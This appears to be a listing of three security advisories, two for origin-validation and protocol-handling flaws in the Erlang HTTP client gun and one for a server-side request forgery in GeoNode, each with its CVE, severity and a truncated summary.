gun HTTP/2 PUSH_PROMISE authority not validated against connection origin allows cross-origin cookie injection
EEF-CVE-2026-43972 CVE-2026-43972 MEDIUM 2 days ago
## Summary
Origin Validation Error vulnerability in ninenines gun (gun\_http2 module) allows cross-origin cookie injection via unvalidated HTTP/2 ...
hex
No PRs yet
gun HTTP/1.1 client accepts unsolicited 101 Switching Protocols response allowing server-driven protocol hijack and OOM
EEF-CVE-2026-43974 CVE-2026-43974 HIGH 2 days ago
## Summary
Unexpected Status Code or Return Value vulnerability in ninenines gun (gun\_http module) allows a malicious HTTP server to force the cl...
hex
No PRs yet
GeoNode contains a server-side request forgery vulnerability in the service registration endpoint
GHSA-hw9r-6m78-w6h3 CVE-2026-39922 MODERATE 2 days ago
GeoNode versions 4.4.5 and 5.0.2 (and prior within their respective releases) contain a server-side request forgery vulnerability in the service re...
pypi
No PRs yet